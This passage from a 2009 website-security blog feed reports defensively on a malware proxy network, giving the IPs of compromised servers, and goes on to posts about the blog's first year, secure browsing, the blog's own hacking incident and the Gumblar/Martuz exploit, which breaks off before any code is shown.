<p>Fortunately, such posts sometimes make difference. The same day <span style="color: #333333;"><strong>Alex de Joode</strong></span>, LeaseWeb’ Security Officer, <a href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/#comment-6380">left a comment</a>, explaining their company&#8217;s abuse handling policy and showing that they were ready to address malware issues.  What more important is I can see the results: <span style="color: #993300;"><em>mdvhost.com</em></span> domain name no  longer resolve. And none of the malicious domains is currently mapped to IP addresses on the LeaseWeb network. Thanks Alex! And thanks <a href="http://cyber.law.harvard.edu/people/mweinstein">Maxim Weinstein</a> (StopBadware.org) who helped to draw attention to this issue.</p>
<h3>The attack is still active</h3>
<p>The loss of the <span style="color: #993300;"><em>mdvhost .com</em></span> server didn&#8217;t stop the attack though. Apparently, hackers have back-up servers to replace the missing one.  Anyway, this switch requires reconfiguring reverse-proxies and have probably slowed down the propagation of the malware.  And by the way, in the beginning of this week I noticed a temporary decrease in this attack detection in <a href="http://www.UnmaskParasites.com">Unmask Parasites</a>. Or was it just a coincidence?</p>
<p>However, the attack is still active. Currently, malicious servers reside mostly on <a href="http://ovh.com">OVH</a> network and on some German networks (for some reason hackers choose European hosting providers)</p>
<p>Here is a sample output of the dig command:</p>
<p>viewhomesale.ru.    432    IN    A    85.25.73.243   <em><span style="color: #888888;">Germany Berlin <a href="www.serverloft.de">Bsb-service Gmbh</a></span></em><br />
viewhomesale.ru.    432    IN    A    91.121.49.129  <em><span style="color: #888888;">France Paris Ovh Sas</span></em><br />
viewhomesale.ru.    432    IN    A    94.23.14.110  <span style="color: #888888;"> <em>France Clermont-ferrand Ovh Sas</em></span><br />
viewhomesale.ru.    432    IN    A    94.23.89.95     <em><span style="color: #888888;">Poland Ovh Sp. Z O. O</span></em><br />
viewhomesale.ru.    432    IN    A    94.23.206.229  <span style="color: #888888;"><em>France Ovh Sas</em></span></p>
<p>Some more IPs:</p>
<p>62.75.184.40   Germany Berlin <a href="http://www.vserver.de">Vserver</a> &#8211; Virtual Dedicated Server-hosting<br />
77.37.19.43    Germany <a href="http://www.star-hosting.de/">Star-hosting E.k</a>. &#8211; Vserver I<br />
91.121.142.111 France Paris Ovh Sas<br />
188.72.199.24  Germany Berlin <a href="http://www.netdirect.de/">De-netdirect</a><br />
213.186.57.19  France Paris Ovh Sas</p>
<p>I hope OVH and the German hosting providers will follow LeaseWeb and finally sweep hackers away from their networks.</p>
<h3>To hosting providers</h3>
<p>The IPs in this post belong to compromised dedicated and virtual dedicated servers where hackers managed to install nginx on port 8080 (they work as reverse-proxies). It would be great if you find the nginx configuration files and determine the address of the central site where they get all the malicious stuff from. You can either post your findings here or contact me directly. Alternatively, you can contact the hosting provider of that malicious server yourselves.</p>
<p>P.S. <strong><span style="color: #3366ff;">Happy New Year!</span></strong></p>
<p><span style="color: #808080;"><strong>Related posts:</strong></span></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/">From Hidden Iframes to Obfuscated Scripts</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/">Dynamic DNS and Botnet of Zombie Web Servers</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/10/28/evolution-of-hidden-iframes/">Evolution of Hidden Iframes</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/">10 FTP Clients Malware Steals Credentials From</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/12/30/evict-hackers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Unmask Parasites. A Year of Blogging.</title>
		<link>http://blog.unmaskparasites.com/2009/12/02/unmask-parasites-a-year-of-blogging/</link>
		<comments>http://blog.unmaskparasites.com/2009/12/02/unmask-parasites-a-year-of-blogging/#comments</comments>
		<pubDate>Wed, 02 Dec 2009 00:59:52 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[statistics]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=431</guid>
		<description><![CDATA[A year ago, on December 1, 2008, I published my first post on this blog. Its title was &#8220;Let&#8217;s Unmask Parasites&#8220;.
Working on Unmask Parasites service, I could easily spot prevalent threats and trends in malware attacks. I used this information to help webmasters of hacked sites on various security-related forums and news groups. However, forum [...]]]></description>
			<content:encoded><![CDATA[<p>A year ago, on December 1, 2008, I published my first post on this blog. Its title was &#8220;<a href="http://blog.unmaskparasites.com/2008/12/01/lets-unmask-parasites/">Let&#8217;s Unmask Parasites</a>&#8220;.</p>
<p>Working on <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> service, I could easily spot prevalent threats and trends in malware attacks. I used this information to help webmasters of hacked sites on various security-related forums and news groups. However, forum format assumes that you answer similar questions again and again, which is very inefficient. That&#8217;s why I decided to publish information about prevalent website security problems here. This way I could write detailed information once and then just link to my articles in my forum answers.</p>
<p><span id="more-431"></span><br />
This approach worked great for me. The very first post about <a href="http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/">.htaccess redirects to bogus anti-virus sites </a>became pretty popular. I didn&#8217;t have to waste my time duplicating the same answers again and again (there were several questions a day from owners of affected sites that time. One year later, there are still many sites hacked this way). Soon enough, my posts started to attract visitors from search engines. As a result, one blog post could help much more webmasters than several similar posts on specialized forums.</p>
<h3>Helping webmasters</h3>
<p>My blog is not an average security blog that talks about new threats. It is not for security specialists (they usually know more than me about the topics I cover here). It is for webmasters who want to keep their site secure. For people who work hard to build their websites and then find out that all their efforts can be easily ruined by hackers. In my posts about hacker attacks, I try to include information about how to detect breaches, clean up web sites, remove malware warnings, and prevent future break-ins. I also try to explain what makes those attacks possible and why hackers target legitimate web sites.</p>
<p>And even if I don&#8217;t have some information about a specific attack, I always encourage my readers to share their information in comments. This worked particularly well for posts about <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Gumblar</a> and <a href="http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/">Goscanpark meta redirects</a>, where comments sections are probably more informative than the posts themselves. Thanks guys.</p>
<h3>Security problems of a security blog</h3>
<p>While most of my posts are based on the information I collect investigating security issues of third-party sites, there had been a real <a href="http://blog.unmaskparasites.com/2009/05/22/security-issues-with-the-blog/">security problem with my own blog</a>. It was originally hosted on a shared server that happened to be hacked (not my blog, but the whole server) back in May. It was a nasty elusive problem that my hosting provider couldn&#8217;t resolve for almost two weeks. Finally, we managed to locate the malicious process and the backdoor script.</p>
<p>To share details about this incident, I posted an article about the <a href="http://blog.unmaskparasites.com/2009/06/18/beladen-elusive-web-server-exploit/">Beladen exploit</a>, which happened to affect many other shared web servers too. This was a lesson for me: in a shared hosting environment your site&#8217;s security depends on security of other websites hosted on the same server. As a result, I <a href="http://blog.unmaskparasites.com/2009/06/06/blog-moved-to-vps/">moved my blog</a> from a shared hosting to a virtual private server (VPS) where I can control (virtually) everything. Of course, now I pay more money for the blog hosting and have to maintain the server myself, but I&#8217;m much more confident that my blog is not dangerous for my readers (I take it seriously).</p>
<h3>False positives</h3>
<p>There had also been a problem with false warnings from certain anti-virus programs. Quite frustrating to see anti-virus programs with flaws in detection algorithms keeping webmasters away from the articles that could help them remove malware from their sites and stop infecting their site visitors&#8217; computers.</p>
<p>In my articles, I post snippets of malicious code that hackers inject into legitimate web pages. I don&#8217;t post screenshots of the malicious code like many other security blog do. The purpose of my articles is to help webmasters of compromised blogs resolve their security issues. So I want them to be able to find my blog when they Google for parts of suspicious code they find inside their web pages. Many webmasters find my blog this way.</p>
<p>I realize the danger of the malicious code that I post. That&#8217;s why I slightly garble it, making it non-executable if copy-pasted into HTML. Nonetheless, some anti-virus programs confuse such code with real malicious code (their detection algorithms are imperfect).  After each report about false positives from my blog readers, I had to garble code samples even more until the false warnings went away.</p>
<h3>Reader contributed information.</h3>
<p>For my posts, I investigate every case myself. However, I can&#8217;t gather complete information without internal access to compromised websites (I&#8217;m not a hacker and never break into third-party websites). That&#8217;s why I&#8217;d like to thank people (webmasters, hosting providers, security researchers, etc.) who <a href="http://blog.unmaskparasites.com/contact/">email me</a> and share internal details about the hacks. Your help is indispensable.</p>
<p>Readers&#8217; comments are also a very important part of this blog. They usually add missing bits to my posts. Sometimes comments sections are more informative than corresponding articles. That&#8217;s great! I&#8217;m glad to provide a place for fruitful discussions.</p>
<p>I&#8217;d also like to thank my readers who allowed me to post their emails on my blog. Here are the two articles based on their emails:</p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/02/05/stats-anomaly-reveals-website-security-issues/">Stats Anomaly Reveals Website Security Issues</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/">Quicksilver Malware Network</a></li>
</ul>
<p>If you want to see your articles published on this blog, don&#8217;t hesitate to <a href="http://blog.unmaskparasites.com/contact/">contact me</a>. Guest post are welcome!</p>
<h3>In the news</h3>
<p>Several posts from this blog have made it into <a href="http://blog.unmaskparasites.com/in-the-news/">major press</a>. You can find references to my articles on sites of the New York Times, Washington Post, The Register, CNet, ComputerWorld, SC Magazine, etc. (<a href="http://blog.unmaskparasites.com/in-the-news/">click here for the full list</a>) Internet security community (e.g. StopBadware.org, Google Online Security blog, IBM Internet Security Systems, Sophos, etc) also actively links to this blog.  I consider it as a proof of the quality of the original content that I post here.</p>
<h3>Stats and facts.</h3>
<p>So a year has passed. Looking back, I can share some interesting (or maybe boring) stats and facts.</p>
<p><strong>60</strong> posts in <strong>5</strong> categories (<strong>114</strong> tags)</p>
<p><strong>122,000+</strong> visits from <strong>178</strong> countries (literally from all over the world), but mainly from the United States (<strong>30%</strong>), United Kingdom (<strong>8%</strong>) and India (<strong>6%</strong>).</p>
<p><strong>41%</strong> of visitors came from search engines (mainly from Google &#8211; <strong>97%</strong>)</p>
<p><strong>1,800+</strong> sites referred visitors to this blog.</p>
<p>The most active <strong>referrers</strong> were:</p>
<ul>
<li><a href="http://www.google.com/support/forum/p/Webmasters?hl=en">Google Webmaster Forums</a></li>
<li><a href="http://www.UnmaskParasites.com">Unmask Parasites</a></li>
<li><a href="http://heise.de">heise.de</a> (after the post about the botnet of compromised web servers)</li>
<li><a href="www.stumbleupon.com">StumbleUpon</a></li>
<li><a href="http://www.theregister.co.uk/">TheRegister</a></li>
<li><a href="http://reddit.com">Reddit</a></li>
<li><a href="http://slashdot.org">Slashdot</a></li>
<li><a href="http://www.sophos.com/blogs/sophoslabs">Sophos</a></li>
</ul>
<p>Most popular <strong>keywords</strong> that sent me visitors from search engines:</p>
<ul>
<li>gumblar</li>
<li>gumblar .cn</li>
<li>martuz .cn</li>
<li>martuz</li>
<li>gifimg.php</li>
</ul>
<p>They are all related to the Gumblar attack and account for <strong>13,000+</strong> visits.</p>
<p>No wonder, my <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">original article about Gumblar</a> is the most visited article on this blog (<strong>55,000+</strong> visits). If I sum up visits to all my articles about Gumblar, it will be almost <strong>79,000</strong> visits. The <a href="http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/">new incarnation of the Gumblar attack</a> is still active so this statistics will only increase.</p>
<p>The second most visited article is <a href="http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/">Malicious “Income” IFrames from .CN Domains</a> &#8211; <strong>21,000+</strong> visits. It was my first article about the iframe injection attack that uses <a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/">stolen FTP credentials</a>. This attack <a href="http://blog.unmaskparasites.com/2009/10/28/evolution-of-hidden-iframes/">evolved over the time</a> and I frequently posted updates. All posts on this topic have been visited more than <strong>40,000</strong> times.</p>
<p>Among other popular topics are <a href="http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/">redirects</a> <a href="http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/">to</a> <a href="http://blog.unmaskparasites.com/2009/11/26/rogue-blogs-regirect-search-traffic-to-bogus-av-sites-part-1/">scareware sites</a> and <a href="http://blog.unmaskparasites.com/2009/06/18/beladen-elusive-web-server-exploit/">Beladen</a>/<a href="http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/">Goscanpark server-wide exploits</a>.</p>
<p><strong>750+</strong> approved comments</p>
<p><strong>Most discussed</strong> posts:</p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">Gumblar .cn Exploit – 12 Facts About This Injected Script</a> &#8211; <strong><a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/#comments">184</a></strong> comments</li>
<li><a href="http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/">Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects</a> &#8211; <strong><a href="http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/#comments">83</a></strong> comments</li>
<li><a href="http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/">Malicious “Income” IFrames from .CN Domains</a> &#8211; <strong><a href="http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/#comments">77</a></strong> comments</li>
<li><a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/">Dynamic DNS and Botnet of Zombie Web Servers</a> &#8211; <strong><a href="http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/#comments">41</a></strong> comments</li>
</ul>
<p><strong>News feed</strong>: Feedburner currently reports about <strong>450</strong> subscribers. Not bad for a specialized blog. If you have a site that you want to protect from hackers or  you are simply into website security, <a href="http://blog.unmaskparasites.com/feed/">consider subscribing</a> too. You can read this blog updates in your favorite <a href="http://blog.unmaskparasites.com/feed/">RSS reader</a> or in your good old <a href="http://feedburner.google.com/fb/a/mailverify?uri=unmaskparasites&amp;loc=en_US">email</a> client. You can also <a href="http://twitter.com/unmaskparasites">follow me</a> on Twitter.</p>
<h3>Looking into the future</h3>
<p>I actively develope <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> and participate in various security forums, so there is no shortage of topics to cover here. If  I had enough time I would post interesting information every day. However, in real world, many posts take at least  2-3 days of research, sometimes a few weeks, so I struggle to publish at least 2-3 original posts a month.</p>
<p>Hope I&#8217;ll be able to find enough time and incentive to keep on blogging at this pace. And if you want to see me motivated, please provide your feedback: leave comments, suggest topics, ask questions, share your information, and spread the word &#8212; this helps me concentrate on blogging ;-)</p>
<p>Read my blog. Keep your sites secure.</p>
<p>Your,<br />
Denis Sinegubko</p>
<p><strong><span style="color: #808080;">Related posts:</span></strong></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/07/01/happy-birthday-unmask-parasites/">Happy Birthday Unmask Parasites!</a></li>
<li><a href="http://blog.unmaskparasites.com/2008/12/01/lets-unmask-parasites/">Let&#8217;s Unmask Parasites</a></li>
</ul>
<p><em>If you like this blog, you might also want to check my free online service called <a href="http://www.UnmaskParasites.com">Unmask Parasites</a>. It helps webmasters solve security problems revealing hidden illicit content in their web pages.</em></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/12/02/unmask-parasites-a-year-of-blogging/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Future of Secure Web Browsing</title>
		<link>http://blog.unmaskparasites.com/2009/07/08/future-of-secure-web-browsing/</link>
		<comments>http://blog.unmaskparasites.com/2009/07/08/future-of-secure-web-browsing/#comments</comments>
		<pubDate>Wed, 08 Jul 2009 22:34:38 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Gazelle]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[virtual machine]]></category>
		<category><![CDATA[web browser]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=249</guid>
		<description><![CDATA[Google Chrome OS
This week Google announced that they are working on a new open source, lightweight operating system that will initially be targeted at netbooks &#8211; Google Chrome OS. That&#8217;s right. It&#8217;s a Google Chrome browser running on top of Linux kernel. Netbooks running Google Chrome OS should be available in the second half of [...]]]></description>
			<content:encoded><![CDATA[<h3>Google Chrome OS</h3>
<p>This week Google announced that they are working on a new open source, lightweight operating system that will initially be targeted at netbooks &#8211; <a href="http://googleblog.blogspot.com/2009/07/introducing-google-chrome-os.html">Google Chrome OS</a>. That&#8217;s right. It&#8217;s a Google Chrome browser running on top of Linux kernel. Netbooks running Google Chrome OS should be available in the second half of 2010. (BTW, will European Union rule Google exclude Google Chrome browser from the default installation of a Google Chrome OS? )</p>
<p>They are going to completely redesign the underlying security architecture of the OS so that users don&#8217;t have to deal with viruses, malware and security updates. As far as I understand the concept, everything should be stored and executed on the web, so traditional malware won&#8217;t work on such a OS. On the other hand, I envision criminals somehow make Chrome users subscribe to their malicious web services.<br />
<span id="more-249"></span></p>
<h3>Gazelle browser</h3>
<p>Another interesting project is the <a href="http://research.microsoft.com/en-us/news/features/gazelle-062909.aspx">Microsoft&#8217;s Gazelle browser</a>. This is a web browser that uses OS principles to isolate web application from each other and from the underlying host operating system. Effectively this browser is an OS  itself (with it&#8217;s own kernel and resources) running on top of the real operating system.  This architecture ensures that any misbehaving code (script, virus, buggy plug-in) affects only it&#8217;s own process, leaving other web applications, the browser kernel, and the host system intact.  Malware can&#8217;t jailbreak and infect your computer. It&#8217;s like Vegas (what happens in Vegas stays in Vegas). They definitely should have called this browser Vegas.</p>
<p>Anyway, it&#8217;s only a proof-of-concept research project and it may take years before something like this will be publicly available.</p>
<h3>The future</h3>
<p>These new projects (operating system as a web browser from Google, and web browser as an operating system from Microsoft) can make a revolution in computer security. Traditional desktop malware will become obsolete. It will be replaced by a new generation of web based malware.  Many antivirus companies may go out of business.</p>
<h3>&#8230; and the present</h3>
<p>You don&#8217;t have to wait another year to try this sort of secure web browsing. Something similar has been available for years. I&#8217;m talking about virtual machines. For example when I&#8217;m working in Windows XP, I I have a Linux guest operating system running in a window specifically to browse the web. Linux is less prone to malware attacks and it is isolated from my Windows. For me, it&#8217;s a combination of Google Chrome OS and Microsoft Gazelle. In this guest OS, where Firefox runs on top of a Linux kernel, &#8220;most of the user experience takes place on the web&#8221; and on the other hand my web browser is works in a stand-alone operating system, isolated from the host OS.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/07/08/future-of-secure-web-browsing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Lesson From a Kenyan Marathon Runner</title>
		<link>http://blog.unmaskparasites.com/2009/06/30/security-lesson-from-a-kenyan-marathon-runner/</link>
		<comments>http://blog.unmaskparasites.com/2009/06/30/security-lesson-from-a-kenyan-marathon-runner/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 13:27:48 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[hidden links]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=241</guid>
		<description><![CDATA[If you have a site/blog but you are not a techie and don&#8217;t know much about website security, you might want to read this article written by a Kenyan marathon runner about how his blog was hacked.
He received an email from Google saying that his site had been temporarily removed from search index because it [...]]]></description>
			<content:encoded><![CDATA[<p>If you have a site/blog but you are not a techie and don&#8217;t know much about website security, you might want to read <a href="http://dailyrunningtips.com/life/how-my-blog-got-hacked/">this article</a> written by a <a href="http://dailyrunningtips.com/">Kenyan marathon runner</a> about how his blog was hacked.</p>
<p>He received an email from Google saying that his site had been temporarily removed from search index because it contained hidden spam links and thus violated Google&#8217;s guidelines.<br />
<span id="more-241"></span><br />
In the article you will read how <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> helped reveal those hidden links, how they were removed, how the penalty affected search engine traffic, and what lesson about website security have been learnt, i.e:</p>
<ul>
<li> Signs that your site is hacked.</li>
<li>Why hackers inject hidden links?</li>
<li>How to protect WordPress blogs?</li>
</ul>
<p>Note that the article is written by a marathon runner. And you don&#8217;t have to be a computer genius to protect your website either. But if your site is important to you, be sure to invest some time and learn some basics about website security. It may cost you much more (in terms of time and money) when you find your site blocked because of security issues.</p>
<p>This guy&#8217;s words apply to most of us:</p>
<blockquote><p>When I started blogging I didn&#8217;t expect to find myself learning about internet security. Learning never ceases and it feels good to be empowered.</p></blockquote>
<p>If you are convinced, here is a great article from Google: <a href="http://googlewebmastercentral.blogspot.com/2009/02/best-practices-against-hacking.html">Best practices agains hacking</a>. While it&#8217;s beginning looks a bit techie, the rest of the article provides valuable information for all site owners. Be sure to read the &#8220;<em>Some resources about CMSs security</em>&#8220;, &#8220;<em>Some ways to identify the hacking of your site</em>&#8221; and &#8220;<em>Hacked behavior removed, now what?</em>&#8221; sections of this article.</p>
<p>Another advice is regularly check your web sites for security issues. If you detect a problem and fix it before Google finds it, the damage will be minimal.</p>
<p>You can use my <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> free online service for quick rough checks. It scans web pages and reveals illicit content and behavior such as hidden spam links, invisible iframes, suspicious scripts and unwanted redirections.</p>
<h3>Have your say</h3>
<p>Please share your thoughts about what makes people start learning about website security. Suggest security resource and &#8220;best practices&#8221; for newbie site owners. Your comments are welcome.</p>
<p><span style="color: #888888;"><strong>Similar posts:</strong></span></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2008/12/01/lets-unmask-parasites/">Let’s Unmask Parasites</a></li>
<li><a href="http://blog.unmaskparasites.com/2009/03/18/badwarebustersorg-out-of-beta/">BadwareBusters.org Out of Beta</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/06/30/security-lesson-from-a-kenyan-marathon-runner/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blog Moved to VPS</title>
		<link>http://blog.unmaskparasites.com/2009/06/06/blog-moved-to-vps/</link>
		<comments>http://blog.unmaskparasites.com/2009/06/06/blog-moved-to-vps/#comments</comments>
		<pubDate>Sat, 06 Jun 2009 06:41:44 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[threaded comments]]></category>
		<category><![CDATA[VPS]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=219</guid>
		<description><![CDATA[Hi,
To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).
However, when I imported WordPress posts to the new location, things didn&#8217;t go as expected and the structure of threaded comments got broken. When you read popular posts with active discussions, you might not [...]]]></description>
			<content:encoded><![CDATA[<p>Hi,</p>
<p>To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).</p>
<p>However, when I imported WordPress posts to the new location, things didn&#8217;t go as expected and the structure of threaded comments got broken. When you <a href="http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/">read popular posts with active discussions</a>, you might not be able to identify who responding to whom. In new posts, threaded comments should be working.<span id="more-219"></span><br />
I&#8217;m trying to figure out if I can resolve the issue. Does anyone have experience moving a WordPress (2.7.1) blog with threaded comments to a new site?</p>
<p>If you find any other glitches, please contact me either via this blog or via <a href="http://blog.unmaskparasites.com/">Unmask Parasites contact form</a>.</p>
<p><em>Update (a few hours later): RTFM! I found this Codex article about <a href="http://codex.wordpress.org/Moving_WordPress">moving WordPress</a>.  Restoring MySQL database from a full dump worked much better (in terms of preserving structure of threaded comments) than simple &#8220;Export/Import&#8221;.  There might be issues with plugins if they store absolute paths in a database though.</em></p>
<p><strong><span style="color: #888888;">Similar posts:</span></strong></p>
<ul>
<li><a href="http://blog.unmaskparasites.com/2009/05/22/security-issues-with-the-blog/">Security Issues With the Blog</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/06/06/blog-moved-to-vps/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Security Issues With the Blog</title>
		<link>http://blog.unmaskparasites.com/2009/05/22/security-issues-with-the-blog/</link>
		<comments>http://blog.unmaskparasites.com/2009/05/22/security-issues-with-the-blog/#comments</comments>
		<pubDate>Fri, 22 May 2009 12:24:55 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Unmask Parasites]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[VPS]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=211</guid>
		<description><![CDATA[Yesterday, I had been notified that my blog&#8217;s web pages sometimes contain malicious scripts. I had to shut down the blog and investigate the issue. Sorry for the inconvenience. I didn&#8217;t want to expose you to any threats.
The Unmask Parasites online service was not affected (it is hosted in a different location, and is very [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday, I had been notified that my blog&#8217;s web pages sometimes contain malicious scripts. I had to shut down the blog and investigate the issue. Sorry for the inconvenience. I didn&#8217;t want to expose you to any threats.</p>
<p>The <a href="http://www.UnmaskParasites.com">Unmask Parasites</a> online service was not affected (it is hosted in a different location, and is very secure). It worked all that time. And during the investigation, my blog redirected visitors to <a href="http://www.UnmaskParasites.com">http://www.UnmaskParasites.com</a><br />
<span id="more-211"></span><br />
I&#8217;d like to thank Googlers (<a href="http://johnmu.com/">John Mueller</a>, <a href="http://oliverfisher.blogspot.com/">Oliver Fisher</a> and Oxana Comanescu) who provided me with details about the issue. The malicious code had been noticed only in a <em><strong>small</strong></em> percentage of server responses (hackers don&#8217;t want to be unmasked). I could never reproduce it myself.</p>
<p>My blog is hosted on a simple shared plan since it doesn&#8217;t require anything fancy. I combed though my whole account and couldn&#8217;t locate any sign of the compromise or any alien code.</p>
<p>I contacted my hosting provider and provided them with all the information I had. They were very responsive and had been investigating the issue for the rest of the day. They took some preventive measures and added traffic filtering so I hope my blog is currently pretty much safe.</p>
<p>Anyway, you shouldn&#8217;t trust even sites like mine. Make sure you are browsing the web with a secure browser. If you are on Windows, consider using <a href="http://www.google.com/chrome">Google Chrome</a> (it warns if a site references something from blacklisted third-party sites) or <a href="http://www.mozilla.com/firefox/">FireFox</a> with the <a href="https://addons.mozilla.org/firefox/addon/722">NoScript</a> extension. With NoScript, you can enable scripts on legitimate domains that you visit, but any third-party scripts (and most website exploits require loading scripts from third-party domains) will be blocked.</p>
<p>When I have all the details from my hosting provider, I&#8217;ll review the issue.</p>
<h3>Moving to VPS</h3>
<p>Meanwhile I consider moving my blog from shared hosting to a VPS (virtual private server), so that I have full control over the things behind the scenes.</p>
<p>I&#8217;m not much of a sysadmin, so I&#8217;ll need some getting started tutorials about how to keep the server secure.</p>
<p>Can anyone suggest a supportive and reliable hosting provider with affordable VPS plans? I don&#8217;t need anything fancy: Apache, MySql, PHP, Wordpress. I guess 256Mb RAM would be enough.</p>
<p>It would also be great if someone could support Unmask Parasites and this blog and help me purchase a VPS.</p>
<p>Feel free to leave your comments here or <a href="http://blog.unmaskparasites.com/contact/">contact me</a> directly.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.unmaskparasites.com/2009/05/22/security-issues-with-the-blog/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Martuz .cn &#8211; New Incarnation of the Gumblar Exploit. So What&#8217;s New?</title>
		<link>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/</link>
		<comments>http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/#comments</comments>
		<pubDate>Mon, 18 May 2009 08:42:09 +0000</pubDate>
		<dc:creator>Denis</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Website exploits]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[Gumblaroid]]></category>
		<category><![CDATA[martuz]]></category>
		<category><![CDATA[obfuscated script]]></category>

		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=204</guid>
		<description><![CDATA[Gumblar is dead
Many people have noticed that &#8220;gumblar .cn&#8221; no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!
Meet the Martuz
The loss of the gumblar .cn domain name can&#8217;t stop hackers. They have slightly modified the script [...]]]></description>
			<content:encoded><![CDATA[<h3>Gumblar is dead</h3>
<p>Many people have noticed that &#8220;<em>gumblar .cn</em>&#8221; no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!</p>
<h3>Meet the Martuz</h3>
<p>The loss of the <em>gumblar .cn</em> domain name can&#8217;t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain &#8211; <strong><em>martuz .cn</em></strong> (95 .129 .145 .58)<br />
<span id="more-204"></span></p>
<h3>The script</h3>
